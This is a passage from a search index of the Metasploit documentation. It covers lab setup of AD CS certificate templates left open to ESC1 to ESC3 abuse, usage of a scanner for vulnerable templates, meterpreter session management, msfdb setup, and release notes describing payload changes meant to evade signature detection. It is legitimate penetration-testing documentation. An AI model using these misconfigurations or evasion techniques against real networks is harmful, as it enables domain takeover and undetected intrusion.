Application Policies ensure that Client Authentication, Server Authentication, KDC Authentication, or Smart Card Logon is listed. | Click the Apply button. | Under the Security tab make sure that Domain Users group listed and the Enroll permissions is marked as allowed for this group. | Under Issuance Requirements tab, ensure that under Require the following for enrollment that the CA certificate manager approval box is unticked, as is the This number of authorized signatures box. | Click Apply and then Ok | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC1-Template certificate, or whatever you named the ESC1 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC2 Vulnerable Certificate Template . | Open up certsrv | Scroll down to Certificate Templates folder, right click on it and select Manage. | Find the ESC1 certificate template you created earlier and right click on that, then select Duplicate Template. | Select the General tab, and then name the template ESC2-Template. Then click Apply. | Go to the Subject Name tab and select Build from this Active Directory Information and select Fully distinguished name under the Subject Name Format. The main idea of setting this option is to prevent being able to supply the subject name in the request as this is more what makes the certificate vulnerable to ESC1. The specific options here I don’t think will matter so much so long as the Supply in the request option isn’t ticked. Then click Apply. | Go the to Extensions tab and click on Application Policies. Then click on Edit. | Delete all the existing application policies by clicking on them one by one and clicking the Remove button. | Click the Add button and select Any Purpose from the list that appears. Then click the OK button. | Click the Apply button, and then OK. The certificate should now be created. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC2-Template certificate, or whatever you named the ESC2 template you created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC3 Template 1 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template1, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Certificate Request Agent, then click OK. | Click Apply. | Go to Issuance Requirements tab and double check that both CA certificate manager approval and This number of authorized signatures are unchecked. | Click Apply if any changes were made or the button is not grey’d out, then click OK to create the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. Then click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template1 certificate, or whatever you named the ESC3 template number 1 template you just created, and select OK. The certificate should now be available to be issued by the CA server. | . Setting up a ESC3 Template 2 Vulnerable Certificate Template . | Follow the instructions above to duplicate the ESC2 template and name it ESC3-Template2, then click Apply. | Go to the Extensions tab, click the Application Policies entry, click the Edit button, and remove the Any Purpose policy and replace it with Client Authentication, then click OK. | Click Apply. | Go to Issuance Requirements tab and double check that both CA certificate manager approval is unchecked. | Check the This number of authorized signatures checkbox and ensure the value specified is 1, and that the Policy type required in signature is set to Application Policy, and that the Application policy value is Certificate Request Agent. | Click Apply and then click OK to issue the certificate. | Go back to the certsrv screen and right click on the Certificate Templates folder. | Click New followed by Certificate Template to Issue. | Scroll down and select the ESC3-Template2 certificate, and select OK. | The certificate should now be available to be issued by the CA server. | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#vulnerable-application",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#vulnerable-application"
  },"537": {
    "doc": "Vulnerable cert finder",
    "title": "Module usage",
    "content": ". | Do: Start msfconsole | Do: use auxiliary/gather/ldap_esc_vulnerable_cert_finder | Do: set BIND_DN &amp;lt;DOMAIN&amp;gt;\\\\&amp;lt;USERNAME to log in as&amp;gt; | Do: set BIND_PW &amp;lt;PASSWORD FOR USER&amp;gt; | Do: set RHOSTS &amp;lt;target IP(s)&amp;gt; | Optional: set RPORT &amp;lt;target port&amp;gt; if target port is non-default. | Optional: set SSL true if the target port is SSL enabled. | Do: run | . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#module-usage",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#module-usage"
  },"538": {
    "doc": "Vulnerable cert finder",
    "title": "Options",
    "content": "REPORT_NONENROLLABLE . If set to True then report any certificate templates that are vulnerable but which are not known to be enrollable. If set to False then skip over these certificate templates and only report on certificate templates that are both vulnerable and enrollable. REPORT_PRIVENROLLABLE . If set to True then report certificate templates that are only enrollable by the Domain and Enterprise Admins groups. If set to False then skip over these certificate templates and only report on certificate templates that are enrollable by at least one additional user or group. ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#options",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#options"
  },"539": {
    "doc": "Vulnerable cert finder",
    "title": "Scenarios",
    "content": "Windows Server 2022 with AD CS . msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) &amp;gt; run [*] Running module against 192.168.159.10 [*] Discovering base DN automatically [!] Couldn't find any vulnerable ESC13 templates! [+] Template: ESC1-Test [*] Distinguished Name: CN=ESC1-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC1 [*] Notes: ESC1: Request can specify a subjectAltName (msPKI-Certificate-Name-Flag) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [+] Issuing CA: msflab-DC-CA (DC.msflab.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [+] Template: ESC2-Test [*] Distinguished Name: CN=ESC2-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msflab,DC=local [*] Manager Approval: Disabled [*] Required Signatures: 0 [+] Vulnerable to: ESC2 [*] Notes: ESC2: Template defines the Any Purpose OID or no EKUs (PkiExtendedKeyUsage) [*] Certificate Template Enrollment SIDs: [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-513 (Domain Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [+] Issuing CA: msflab-DC-CA (DC.msflab.local) [*] Enrollment SIDs: [*] * S-1-5-11 (Authenticated Users) [*] * S-1-5-21-3978004297-3499718965-4169012971-519 (Enterprise Admins) [*] * S-1-5-21-3978004297-3499718965-4169012971-512 (Domain Admins) [*] Auxiliary module execution completed . ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html#scenarios"
  },"540": {
    "doc": "Vulnerable cert finder",
    "title": "Vulnerable cert finder",
    "content": " ",
    "url": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html",
    "relUrl": "/docs/pentesting/active-directory/ad-certificates/ldap_esc_vulnerable_cert_finder.html"
  },"541": {
    "doc": "Loading Test Modules",
    "title": "Loading Test Modules",
    "content": "Metasploit offers inbuilt test modules which can be used for verifying Metasploit’s post-exploitations work with currently opened sessions. These modules are intended to be used by developers to test updates to ensure they don’t break core functionality and should not be used during normal operations. These modules also as part of the automated test suite within pull requests. By default the test modules in Metasploit are not loaded when Metasploit starts. To load them, run loadpath test/modules after which you should see output similar to the following: . msf6 &amp;gt; loadpath test/modules Loaded 38 modules: 14 auxiliary modules 13 exploit modules 11 post modules msf6 &amp;gt; . The modules can be searched for: . msf6 &amp;gt; search post/test Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/test/cmd_exec . normal No Meterpreter cmd_exec test 1 post/test/railgun . normal No Railgun API Tests 2 post/test/extapi . normal No Test Meterpreter ExtAPI Stuff 3 post/test/get_env . normal No Test Post::Common Get Envs 4 post/test/services . normal No Test Post::Windows::Services 5 post/test/all . normal No Test all applicable post modules ... etc etc ... Example of running the test module against an opened session: . msf6 &amp;gt; use post/test/cmd_exec msf6 post(test/cmd_exec) &amp;gt; run session=-1 ... [*] Testing complete in 2.04 seconds [*] Passed: 6; Failed: 0; Skipped: 0 [*] Post module execution completed . The post/test/all module is an aggregate module that can be used to quickly run all of the applicable test modules against a currently open session: . msf6 post(test/all) &amp;gt; run session=-1 [*] Applicable modules: Valid modules for x86/windows session 1 ======================================= # Name is_session_platform is_session_type - ---- ------------------- --------------- 0 test/railgun_reverse_lookups Yes Yes 1 test/search Yes Yes 2 test/services Yes Yes 3 test/meterpreter Yes Yes 4 test/cmd_exec Yes Yes 5 test/extapi Yes Yes 6 test/file Yes Yes 7 test/get_env Yes Yes 8 test/railgun Yes Yes 9 test/registry Yes Yes 10 test/unix No Yes 11 test/mssql Yes No 12 test/mysql Yes No 13 test/postgres Yes No 14 test/smb Yes No [*] Running test/cmd_exec against session -1 [*] -------------------------------------------------------------------------------- ... etc etc ... [*] Running test/extapi against session -1 [*] -------------------------------------------------------------------------------- ... etc etc ... ",
    "url": "/docs/development/quality/loading-test-modules.html",
    "relUrl": "/docs/development/quality/loading-test-modules.html"
  },"542": {
    "doc": "Managing Sessions",
    "title": "Sessions Command",
    "content": "Session Search . When you have a number of sessions open, searching can be a useful tool to navigate them. This guide explains what capabilities are available for navigating open sessions with search. You can get a list of sessions matching a specific criteria within msfconsole: . msf6 payload(windows/meterpreter/reverse_http) &amp;gt; sessions --search \"session_id:1 session_id:2\" Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @WIN-ED9KFH65RDH 192.168.2.1:4444 -&amp;gt; 192.168.2.132:52190 (192.168.2.132) . Currently, the only supported keywords for search are session_id, session_type, and last_checkin. These keywords can be combined to further filter your results, and used with other flags. For example: . msf6 payload(windows/meterpreter/reverse_http) &amp;gt; sessions --search \"session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s\" -v Active sessions =============== Session ID: 1 Name: Type: meterpreter windows Info: WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH Tunnel: 192.168.2.1:4444 -&amp;gt; 192.168.2.132:52190 (192.168.2.132) Via: exploit/multi/handler Encrypted: Yes (AES-256-CBC) UUID: 958f7b976db67d60/x86=1/windows=1/2023-10-19T12:38:05Z CheckIn: 21725s ago @ 2023-10-19 09:26:08 -0500 Registered: No . Of note in the above example, last_checkin requires an extra argument. The second argument must be either greater_than or less_than. The third argument can be a sequence of alternating amounts and units of time (d: days, h: hours, m: minutes, and s: seconds), i.e. 5m2s, 10d, or 1d5m. Killing stale sessions . If --search is used in conjunction with --kill-all, it will restrict the latter function to only the search results. For example: . msf6 payload(windows/meterpreter/reverse_http) &amp;gt; sessions -K -S \"session_type:meterpreter\" [*] Killing matching sessions... Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -&amp;gt; 192.168.2.132:52190 (192.168.2.132) 2 meterpreter x86/windows WIN-ED9KFH65RDH\\Zach Goldman @ WIN-ED9KFH65RDH 192.168.2.1:4444 -&amp;gt; 192.168.2.132:52192 (192.168.2.132) [*] 192.168.2.132 - Meterpreter session 1 closed. [*] 192.168.2.132 - Meterpreter session 2 closed. msf6 payload(windows/meterpreter/reverse_http) &amp;gt; . ",
    "url": "/docs/using-metasploit/basics/managing-sessions.html#sessions-command",
    "relUrl": "/docs/using-metasploit/basics/managing-sessions.html#sessions-command"
  },"543": {
    "doc": "Managing Sessions",
    "title": "Managing Sessions",
    "content": " ",
    "url": "/docs/using-metasploit/basics/managing-sessions.html",
    "relUrl": "/docs/using-metasploit/basics/managing-sessions.html"
  },"544": {
    "doc": "Measuring Metasploit Performance",
    "title": "Measuring Metasploit Performance",
    "content": "Metasploit has inbuilt tooling for measuring the performance of commands and generating CPU/memory reports after msfconsole or msfvenom is closed. Measuring CPU/memory . You can measure CPU/memory usage when starting msfconsole/msfvenom with environment variables: . METASPLOIT_CPU_PROFILE=true ./msfconsole -x 'exit' METASPLOIT_MEMORY_PROFILE=true ./msfconsole -x 'exit' . Granular CPU/memory performance can be recorded using Ruby blocks: . Metasploit::Framework::Profiler.record_cpu do # ... end . Metasploit::Framework::Profiler.record_memory do # ... end . In both scenarios, reports will be generated and written to disk that can be opened in a file editor/browser. Measuring command performance . The time command in msfconsole can be used to record the performance of a command: . msf6 exploit(windows/smb/ms17_010_psexec) &amp;gt; time reload [*] Reloading module... [+] Command \"reload\" completed in 0.20876399998087436 seconds . It is possible to record CPU and memory usage with the --memory and --cpu flags: . msf6 exploit(windows/smb/ms17_010_psexec) &amp;gt; time --cpu search smb ... etc ... Generating CPU dump /var/folders/wp/fp12h8q13kq7mvf4mll72c140000gq/T/msf-profile-2023030711505620230307-77101-4josw1/cpu [+] Command \"search smb\" completed in 0.4150249999947846 seconds . Examples: . time time -h time --help time search smb time --memory search smb time --cpu search smb . ",
    "url": "/docs/development/quality/measuring-metasploit-performance.html",
    "relUrl": "/docs/development/quality/measuring-metasploit-performance.html"
  },"545": {
    "doc": "Merging Metasploit Payload Gem Updates",
    "title": "Merging Metasploit Payload Gem Updates",
    "content": "When the Metasploit Payloads has a new merge appear in master, a new Ruby gem is built and automatically pushed up to RubyGems. This new version needs to be merged into the Metasploit Framework repository for those changes to be included. To do this, committers must: . | Create a new branch in the Metasploit Framework repository. | Name it something useful like metasploit-payloads-&amp;lt;version&amp;gt;. | Modify metasploit-framework.gemspec, so that the new version number is specified for the metasploit-payloads gem. | Run bundle install. | Remove any test/development binaries from data/meterpreter. | Run tools/modules/update_payload_cached_sizes.rb. | Make sure that Gemfile.lock only contains changes that are related to Metasploit Payloads. | Stage the following for commit in git: . | Gemfile.lock | metasploit-framework.gemspec | Any payload modules that have had an updated payload size (usually this includes stageless payloads only) | . | Commit the staged files. | Push the branch to github. | Create the Pull Request. | . Done! . A sample update PR/commit can be found here: https://github.com/rapid7/metasploit-framework/pull/7666/files . ",
    "url": "/docs/development/maintainers/ruby-gems/merging-metasploit-payload-gem-updates.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/merging-metasploit-payload-gem-updates.html"
  },"546": {
    "doc": "Metasploit Framework 5.0 Release Notes",
    "title": "Get Metasploit 5.0",
    "content": "You can get Metasploit 5.0 by checking out the 5.0.0 tag in the Metasploit GitHub project. Need a primer on Framework architecture and usage? Take a look at our wiki here, and feel free to reach out to the broader community on Slack. There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can’t find something you want in our wiki, ask Google or the community what they recommend. See all the ways to stay informed and get involved at https://metasploit.com. ",
    "url": "/docs/development/roadmap/metasploit-5-release-notes.html#get-metasploit-50",
    "relUrl": "/docs/development/roadmap/metasploit-5-release-notes.html#get-metasploit-50"
  },"547": {
    "doc": "Metasploit Framework 5.0 Release Notes",
    "title": "Metasploit Framework 5.0 Release Notes",
    "content": "Metasploit Framework 5.0 has released! . Metasploit 5.0 brings many new features, including new database and automation APIs, evasion modules and libraries, language support, improved performance, and ease-of-use. See the release announcement here. The following is a high-level overview of Metasploit 5.0’s features and capabilities. | Metasploit users can now run the PostgreSQL database by itself as a RESTful service, which allows for multiple Metasploit consoles and external tools to interact with it. | Parallel processing of the database and regular msfconsole operations improves performance by offloading some bulk operations to the database service. | A JSON-RPC API enables users to integrate Metasploit with additional tools and languages. | This release adds a common web service framework to expose both the database and the automation APIs; this framework supports advanced authentication and concurrent operations. Read more about how to set up and run these new services here. | Adds evasion module type and libraries to let users generate evasive payloads without having to install external tools. Read the research underpinning evasion modules here. Rapid7’s first evasion modules are here. | The metashell feature allows users to run background sessions and interact with shell sessions without needing to upgrade to a Meterpreter session. | External modules add Metasploit support for Python and Go in addition to Ruby. | Any module can target multiple hosts by setting RHOSTS to a range of IPs, or by referencing a hosts file with the file:// option. Metasploit now treats RHOST and RHOSTS as identical options. | An updated search mechanism improves Framework start time and removes database dependency. | . ",
    "url": "/docs/development/roadmap/metasploit-5-release-notes.html",
    "relUrl": "/docs/development/roadmap/metasploit-5-release-notes.html"
  },"548": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Payload Improvements",
    "content": "Quite a few payload improvements have been made, most but not all have been for the Meterpreter payload and it’s various implementations. Among other things, it was updated to support AES encryption in CBC mode in all implementations on all transports. This helps to secure framework users data in transit. Now any files transferred, commands issued, etc. are encrypted on the network using a AES and a key negotiated via RSA. This helps remove static strings from network traffic, but it’s not the only change targeting obfuscation. Each of the Meterpreter commands were replaced with an integer equivalent, thus removing conspicuous values such as stdapi_fs_file_copy, core_migrate and mimikatz_custom_command. Additionally, the payload binaries were updated to utilize functions by ordinal value rather than by name. This allows them to be called without disclosing their own conspicuous values such as RefletiveLoader, ext_server_, etc. Lastly, the static “Block API” used by almost all x86 and x64 Windows shellcode payloads was updated to be polymorphic, causing it to be randomized on each invocation. In some payloads, the Block API accounts for as much as half of the shellcode and was an easy target for signature-based detection. All of these changes mark strides towards complicating the identification of key artifacts generated by Metasploit via static analysis, ie. signatures. Compatibility Changes . Metasploit 6 drops Meterpreter support for Windows versions older than XP SP2. This service pack adds a number of API methods that are required by Meterpreter and backporting compatibility is not a priority at this time. The Meterpreter stage will fail to load on these older, unsupported versions. This results in a message saying that the session was closed. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#payload-improvements",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#payload-improvements"
  },"549": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "SMB 3",
    "content": "Metasploit 6 adds support for SMB client connections using the version 3 dialects. This adds compatibility for a large pool of modules to work in environments where SMB version 1 and 2 have been disabled. Additionally, one of the most notable improvements of the version 3 dialects is encryption support, which when negotiated allows the framework to secure it’s connections to compatible SMB servers. SMB version 3, which was added in Windows 8 and Server 2012 incorporates a few security improvements leading to many organizations migrating towards its exclusive use within their environments. While many modules were updated to use the RubySMB SMB 3 implementation, not all were updated. Notably many older exploits that pre-date the release of SMB 3 were not updated and continue to use the original Rex implementation of the protocol. For those modules that have been updated however, users will be able to use them without any changes to their work flow. By default the newest dialect will be negotiated with the remote server and if it is one of the dialects within version 3 that supports encryption, the framework will use encryption by default. Users can alter this behavior by setting the SMB::AlwaysEncrypt and SMB::ProtocolVersion options. SMB::AlwaysEncrypt enforces encryption for SMB 3 connections even when the server does not require it (defaults to: true) while SMB::ProtocolVersion is a comma separated list of versions to allow the framework to negotiate (default: 1,2,3). Module authors looking to write SMB modules should note the move towards the RubySMB protocol stack instead of the legacy Rex implementation. Much of the functionality is standardized within the mixins however some edge-case functionality must still be ported over to RubySMB. For information on writing modules target SMB for Metasploit, see Guidelines for Writing Modules with SMB. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#smb-3",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#smb-3"
  },"550": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Pull Requests",
    "content": "A complete list of pull requests included as part of the initial version 6 work: . | Payload Improvements . | Add AES TLV encryption support: Java, Python . | Support AES-128-CBC as an additional option: Framework Core, Java | Change from PEM to DER for crypt TLV negotiation: Windows, Java, PHP, Framework Core, mettle, Python | . | Remove DLL exports from Meterpreter: Windows Framework Core, ReflectiveDLLInjection | Replace METHOD string with COMMAND_ID integer (to remove obvious strings): Framework Core, Windows, Java, PHP, Python | Cross-compile Windows binaries on Linux . | Various changes required for cross compilation | Update readme for cross compilation | . | Remove the old Mimikatz extension: Windows, Framework Core | Polymorphic x86/x64 Block API | . | Add SMBv3 support: ruby_smb, Framework Core . | Fixes and improvements from MSF code review | Store server system and start time values | . | Add a command target to the PSexec module | . ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#pull-requests",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#pull-requests"
  },"551": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Get Metasploit 6.0",
    "content": "You can get Metasploit 6.0 by checking out the 6.0.0 tag in the Metasploit GitHub project. Need a primer on Framework architecture and usage? Take a look at our wiki here, and feel free to reach out to the broader community on Slack. There are also myriad public and user-generated resources on Metasploit tips, tricks, and content, so if you can’t find something you want in our wiki, ask Google or the community what they recommend. See all the ways to stay informed and get involved at https://metasploit.com. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html#get-metasploit-60",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html#get-metasploit-60"
  },"552": {
    "doc": "Metasploit Framework 6.0 Release Notes",
    "title": "Metasploit Framework 6.0 Release Notes",
    "content": "Metasploit Framework 6.0 is in progress! . Metasploit 6.0 adds a number of features and promotes a theme of being “secure by default”. See the release initial announcement here. ",
    "url": "/docs/development/roadmap/metasploit-6-release-notes.html",
    "relUrl": "/docs/development/roadmap/metasploit-6-release-notes.html"
  },"553": {
    "doc": "Metasploit Breaking Changes",
    "title": "Metasploit Breaking Changes",
    "content": "Occasionally, we have ideas or submissions that are absolutely awesome, but that require us to completely change how Metasploit does something, so the deployment of the feature must be done carefully. In Metasploit 6, it was the way we enumerated commands to the Meterpreter payloads and how we implemented crypto (as in cryptography) between framework and payloads. In an effort to chart these breaking changes, there is a github label for “Breaking Change” and we can use this space to talk about them as well. ",
    "url": "/docs/development/roadmap/metasploit-breaking-changes.html",
    "relUrl": "/docs/development/roadmap/metasploit-breaking-changes.html"
  },"554": {
    "doc": "Metasploit Data Service",
    "title": "Rationale",
    "content": "The current data storage mechanism couples the metasploit core framework code to the current data storage technology. Coupling causes inflexibility which are reflected via the following problems: . | Changes to the current data model are complex | The ability to support/use different data storage technologies is difficult | Promotes a monolithic architecture where poor performance in any segment of the software affects the entire system (large network scans) | . Our solution to this is a data service proxy. A data service proxy allows us to separate core Metasploit Framework code from the underlying data service technology. The framework.db reference to data services is no longer tied directly to the underlying data storage, but instead all calls are proxied to an underlying implementation. Currently we plan to support the legacy data storage technology stack (RAILS/PostgreSQL) which we hope to eventually phase out. The new implementation will use a RESTful (https://en.wikipedia.org/wiki/Representational_state_transfer) approach whereby calls to framework.db can be proxied to a remote web service that supports the same data service API. We have built a web service that runs atop the current data storage service for the community. This approach enables us to: . | More easily enhance the Metasploit data model | Run a web-based data service independent of the Metasploit Framework . | Reduces the memory used by a Metasploit Framework instance using a data service by no longer requiring a DB client | Increases throughput as storage calls don’t necessarily need to be asynchronous | Allow teams to collaborate easily by connecting to a centralized data service | . | Quickly build out data services that leverage different technology stacks | Isolate component testing | Users of metasploit can now leverage a rigid API to build other tools easily (documentation to be provided soon) | . ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#rationale",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#rationale"
  },"555": {
    "doc": "Metasploit Data Service",
    "title": "Usage",
    "content": "For more information on setting up the web service and using the data services see Metasploit Web Service. ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#usage",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html#usage"
  },"556": {
    "doc": "Metasploit Data Service",
    "title": "Metasploit Data Service",
    "content": "Project Goliath came about primarilly around the need to enhance the current data service and data models to increase the value of data in metasploit to our end users. This work is currently being done in 2 stages: . Stage 1 . This is currently a work in progress (which is why Goliath is currently not fully functional). The work being done or already done include: . | Port of the current data models to be used over HTTP / HTTPS | Creation of a web service that serves the metasploit data model | Creation of a new command in metasploit to remote (web based) data services | Creation of a Metasploit Data Service API V1 document | . Stage 2 . | Enhance the current data model | Creation of a Metasploit Data Service API V2 document Potential Changes include (feel free to submit ideas): . | Creation of a generic data type (for when you can’t figure out which data type data belongs) | . | . ",
    "url": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html",
    "relUrl": "/docs/development/roadmap/metasploit-data-service-enhancements-goliath.html"
  },"557": {
    "doc": "Database Support",
    "title": "What is msfdb?",
    "content": "msfdb is a script included with all installations of Metasploit that allows you to easily setup and control both a database and a Web Service capable of connecting this database with Metasploit. While msfdb is the simplest method for setting up a database, you can also set one up manually. Instructions on manual setup can be found here. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#what-is-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#what-is-msfdb"
  },"558": {
    "doc": "Database Support",
    "title": "Why should I use msfdb?",
    "content": "It’s not mandatory to use a database with Metasploit, it can run perfectly fine without one. However, a lot of the features that makes Metasploit so great require a database, and msfdb is the simplest way to setup a Metasploit compatible database. The Metasploit features that require a connected database include: . | Recording other machines on a network that are found with a nmap scan via the db_nmap command are stored as “Hosts”. | Hosts can be viewed with the hosts command | . | Storing credentials successfully extracted by exploits are stored as “creds”. | Credentials are viewed with the creds command. | . | Keeping track of successful exploitation attempts are recorded as “Vulnerabilities”. | Successful exploitations can be viewed with the vulns command. | The vulns command also tracks unsuccessful exploitation attempts | . | Storing services detected on remote hosts by db_nmap are recorded as “Services” . | Remote services are viewed with the services command | . | Tracking multiple remote sessions opened by exploit payloads . | These sessions can be managed and tracked with the sessions command. | . | Storing any difficult to define information returned by successful exploits as “Loot” . | Viewable with the loot command | . | Keeping track of “Ping back payloads”, a non-interactive payload type that provides users with confirmation of remote execution on a target | Pivot through a network with “Routes” comprised of active sessions . | Viewable with the routes command | . | Building reports comprising all of the above information (Restricted to Pro users) | . All of the above features can also be logically separated within workspaces. By using the workspace command, you can place the results of certain operations in different workspaces. This helps keep any data generated or recorded during your use of Metasploit organized and easy to follow. ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#why-should-i-use-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#why-should-i-use-msfdb"
  },"559": {
    "doc": "Database Support",
    "title": "Using msfdb",
    "content": "Using msfdb is simple. If you are starting the database for the first time navigate to the folder Metasploit is saved to, and run ./msfdb init . Creating database at /Users/your_current_account_name/.msf4/db Starting database at /Users/your_current_account_name/.msf4/db...success Creating database users Writing client authentication configuration file /Users/your_current_account_name/.msf4/db/pg_hba.conf Starting database at /Users/your_current_account_name/.msf4/db...success Creating initial database schema . This looks like a lot of information, but all it’s saying is that it’s creating the database Metasploit will use to store information. If you start up msfconsole now it should automatically connect to the database, and if you run db_status you should see something like this: . msf6 &amp;gt; db_status [*] Connected to msf. Connection type: postgresql. You can also setup a Web Service, which Metasploit can use to connect to the database you have just created. Msfdb needs to establish the credentials that are used in the Web Service. If you run msfdb --component webservice init the first prompt asks you what username you want to use to connect to the database: . [?] Initial MSF web service account username? [your_current_account_name]: . Then the password used to authenticate to the Web Service: . [?] Initial MSF web service account password? (Leave blank for random password): . Hitting enter for both these prompts will setup up the Web Service correctly. You can change these defaults and use a specific username and password if you want, but it’s not necessary. After these two prompts are dealt with, your Web Service will start! . Generating SSL key and certificate for MSF web service Attempting to start MSF web service...success MSF web service started and online Creating MSF web service user your_current_account_name ############################################################ ## MSF Web Service Credentials ## ## ## ## Please store these credentials securely. ## ## You will need them to connect to the webservice. ## ############################################################ MSF web service username: your_current_account_name MSF web service password: super_secret_password MSF web service user API token: super_secret_api_token MSF web service configuration complete The web service has been configured as your default data service in msfconsole with the name \"local-https-data-service\" If needed, manually reconnect to the data service in msfconsole using the command: db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443 The username and password are credentials for the API account: https://localhost:5443/api/v1/auth/account . Again, this is a lot of information to process, but it’s not nearly as complicated as it looks. The Username, Password, and API token used to connect to the Web Service is displayed: . MSF web service username: your_current_account_name MSF web service password: super_secret_password MSF web service user API token: super_secret_api_token . Followed by instructions on how to connect to your database with Metasploit via the Web Service: . If needed, manually reconnect to the data service in msfconsole using the command: db_connect --token super_secret_api_token --cert /Users/your_current_account_name/.msf4/msf-ws-cert.pem --skip-verify https://localhost:5443 . And the URL you can visit with your browser in order to connect to the Web Service This is useful for checking if the Web Service is running: . The username and password are credentials for the API account: https://localhost:5443/api/v1/auth/account . All this information is loaded by Metasploit automatically at startup from the ~/.msf4 folder. You should copy the credentials to a file in case you need them in the future. If you forget or lose the credentials but you can always run ./msfdb reinit and reset the Web Service authentication details. Just make sure to say no to the prompt asking you if you want to delete the Database contents! . ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#using-msfdb",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#using-msfdb"
  },"560": {
    "doc": "Database Support",
    "title": "msfdb commands",
    "content": "The commands for msfdb are as follows: . | ./msfdb init Creates and begins execution of a database &amp;amp; web service. Additional prompts displayed after this command is executed allows optional configuration of both the username and the password used to connect to the database via the web service. Web service usernames and passwords can be set to a default value, or a value of the users choice. | ./msfdb delete Deletes the web service and database configuration files. You will also be prompted to delete the database’s contents, but this is not mandatory. | ./msfdb reinit The same as running ./msfdb delete followed immediately by ./msfdb init. | ./msfdb status Displays if the database &amp;amp; web service are currently active. If the database is active it displays the path to its location. If the web service is active, the Process ID it has been assigned will be displayed. | ./msfdb start Start the database &amp;amp; web service. | ./msfdb stop Stop the database &amp;amp; web service. | ./msfdb restart The same as running ./msfdb stop followed immediately by ./msfdb start. | . ",
    "url": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-commands",
    "relUrl": "/docs/using-metasploit/intermediate/metasploit-database-support.html#msfdb-commands"
  },"561": {
    "doc": "Database Support",
    "title": "msfdb errors",
    "content": "In the case of any of the above commands printing either a stack trace or error, your first step should be to run ./msfdb reinit (again making sure to say no to the prompt asking you if you want to delete the Database contents) and reattempt the command that caused the error. If the error persists, copy the command you executed, the output generated, and paste it into an error ticket. ",
